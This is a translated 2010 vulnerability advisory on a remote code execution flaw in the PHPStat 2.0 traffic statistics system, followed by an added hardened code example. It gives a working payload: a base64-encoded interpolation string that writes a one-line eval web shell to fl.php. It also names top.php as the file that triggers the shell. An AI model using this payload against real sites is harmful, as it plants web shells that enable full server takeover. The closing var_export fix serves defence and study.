PHPStat 2.0 remote code execution vulnerability - vulnerability warning - the black bar safety net

ID MYHACK58:62201027709
Type myhack58
Reporter Anonymous
Modified 2010-07-28T00:00:00


phpStat is a professional website traffic statistics system that provides website log analysis, web data analysis and user behavior analysis, giving customers in-depth, cross-referenced traffic data reports. It has its own analysis system for visitor behavior analysis, web marketing analysis and site decision support, intended to help customers find what is really valuable behind the data and arrive at actionable recommendations. The system's developer, puai hotel, positions itself as China's most professional provider of website data analytics technology. The code's functionality is really good, but its security is very poor, and vulnerabilities are visible everywhere. Websites that use PHPStat for statistics can essentially be compromised in an instant.

Most of the system's code is Zend-encrypted. After decrypting it, let us look at the code in user_info.php through which an ordinary user modifies a statistics website; the code for adding a new one is substantially similar.

    ......
    $fileStr .= "<?\nif( ! defined('WEB_HOME') ) exit('Access Denied');\n";
    $fileStr .= "if( file_exists( \"../count/exclusion/website_\".\$websiteid.\"_regexp.php\") )\n";
    $fileStr .= "include_once \"../count/exclusion/website_\".\$websiteid.\"_regexp.php\";\n";
    $fileStr .= "\n//statistics website address\n";
    // the POSTed value is concatenated, unfiltered, into a double-quoted PHP string
    $fileStr .= "\$siteurl = \"".$_POST['site']."\";\n";
    $fileStr .= "\n//process the exclude IP address list\n";
    ......
    $fileStr .= "\$mainsitecode = \"".$Tmp[sitegroup]."\";\n";
    $fileStr .= "?>";
    if ( ! file_exists( COUNT_DIRNAME."/exclusion/website_".$Tmp[website].".php" ) )
    {
        write_to_file( COUNT_DIRNAME."/exclusion/website_".$Tmp[website].".php", "", "w+" );
    }
    ......

As the code above shows, if an ordinary user adds a site numbered 100003, the configuration file is \count\exclusion\website_100003.php, with content in the following format:

    <?
    if( ! defined('WEB_HOME') ) exit('Access Denied');
    if( file_exists( "../count/exclusion/website_".$websiteid."_regexp.php") )
    include_once "../count/exclusion/website_".$websiteid."_regexp.php";

    //statistics website address
    $siteurl = " ";

    //list of IP addresses the program excludes
    //list of directory addresses the program includes
    //code of the primary site the program belongs to
    $mainsitecode = "50";
    ?>

As the code above shows, the siteurl we submit is written into the PHP file inside double quotation marks. Readers familiar with PHP will understand what that means: because of the way double-quoted strings behave, we can construct a special siteurl that is written to the file and executed successfully. I configured the siteurl as follows:

    http://${${fputs(fopen(base64_decode(ZmwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgpz4x))}}

The code above writes <?php @eval($_POST[a]); ?>1 to the file fl.php. Base64 encoding avoids the use of single quotes, so there is no need to consider the influence of gpc. Note that when the string does not include special symbols such as + \ =, the base64_decode parameter can be given without single or double quotation marks.

One problem still remains: the code at the beginning of the file, if( ! defined('WEB_HOME') ) exit('Access Denied');, prevents us from triggering this small piece of shellcode directly, so we have to find a file that defines WEB_HOME and includes our file. PHPStat provides a number of such files. Let us continue with part of the code of \templates\ms\common\top.php, a file that can be accessed directly.

    <?
    session_start();
    include_once '../../../';
    include_once '../../../';
    include_once '../../../';
    include_once '../../../';
    include_once '../../../';
    include_once '../../../';
    include_once '../../../parse_site.php';
    $website = strtolower(strval($_GET[website]));
    $action = strtolower(strval($_GET[action]));
    $websiteid = $website;
    $queryLimit = new queryLimit();
    if( strval($_GET[showtype] ) == 'all' ) $website = $website."&showtype=all";
    include_once "../../../".COUNT_DIRNAME."/exclusion/website_".$websiteid.".php"; //here you can trigger our code
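
A hardened counterpart to the user_info.php generator shown above, as an added example that is not PHPStat's code or the original author's: the value is allow-listed and then emitted with var_export() as a single-quoted literal, so the included file never parses it as a double-quoted string. The names render_site_config and export_literal, the allow-list pattern and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Added example, not PHPStat code: function names and the allow-list are assumptions.

// var_export() returns a single-quoted PHP literal with ' and \ escaped.
// Single-quoted strings are never interpolated, so "$" and "{" stay plain data.
function export_literal(string $value): string
{
    return var_export($value, true);
}

function render_site_config(string $siteUrl, string $siteGroup): string
{
    // Allow-list: http(s) scheme, plain hostname, optional port and path.
    $ok = preg_match('#^https?://[a-z0-9.-]+(:\d{1,5})?(/[\w./%~-]*)?\z#i', $siteUrl);
    if ($ok !== 1 || !ctype_digit($siteGroup)) {
        throw new InvalidArgumentException('value rejected');
    }
    return "<?php\n"
         . "if (!defined('WEB_HOME')) exit('Access Denied');\n"
         . '$siteurl = ' . export_literal($siteUrl) . ";\n"
         . '$mainsitecode = ' . export_literal($siteGroup) . ";\n";
}

// Constructed inputs: an ordinary URL, and one carrying interpolation syntax
// (a harmless phpversion() probe standing in for hostile input).
$samples = ['http://www.example.com/', 'http://${${phpversion()}}'];

foreach ($samples as $url) {
    try {
        echo render_site_config($url, '50');
    } catch (InvalidArgumentException $e) {
        echo 'rejected by allow-list: ' . $url . "\n";
    }
}

// Second layer on its own: even with the allow-list skipped, the generated
// assignment stores the input verbatim when the file is included.
$tmp = tempnam(sys_get_temp_dir(), 'cfg');
file_put_contents($tmp, "<?php\n" . '$siteurl = ' . export_literal($samples[1]) . ";\n");
include $tmp;
unlink($tmp);
var_dump($siteurl === $samples[1]);
```

Storing such settings as data (a database row or a JSON file read with json_decode) instead of generated PHP removes the included-file code path altogether.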
